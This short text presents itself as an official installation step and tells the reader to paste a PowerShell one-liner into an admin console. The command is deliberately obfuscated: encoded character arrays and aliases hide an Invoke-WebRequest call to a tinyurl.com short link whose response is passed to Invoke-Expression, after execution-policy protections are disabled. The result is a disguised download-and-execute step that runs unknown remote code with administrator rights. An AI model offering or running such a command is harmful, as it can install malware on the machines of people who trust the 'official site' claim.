From the official site, via ISE OR [ PowerShell / Terminal -- As Admin ]

via ISE - PowerShell  - Terminal

# Copy / Paste into the console window #
Set-ExecutionPolicy -ExecutionPolicy Unrestricted -Scope Process -Force
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
&(gal ?e[?x]) (&(gal (-join (210,238,228|%{[CHAR]($_ -shr 1)}))) -UseB -User "DarthVader/1.0" -Ma 2 -Me Get -Ur (-join (232,210,220,242,234,228,216,92,198,222,218,94,242,214,240,198,204,220,114,104 | % { [char]($_ -shr 1) })) -H `
@{(('Vtfs-Bhfou'.ToCharArray()|%{if($_-match'[a-zA-Z]'){[char]([int]$_-1)}else{$_}})-join'')=(('TFDVSF_NPEF'.ToCharArray()|%{if($_-match'[a-zA-Z]'){[char]([int]$_-1)}else{$_}})-join'')})
# Copy / Paste into the console window #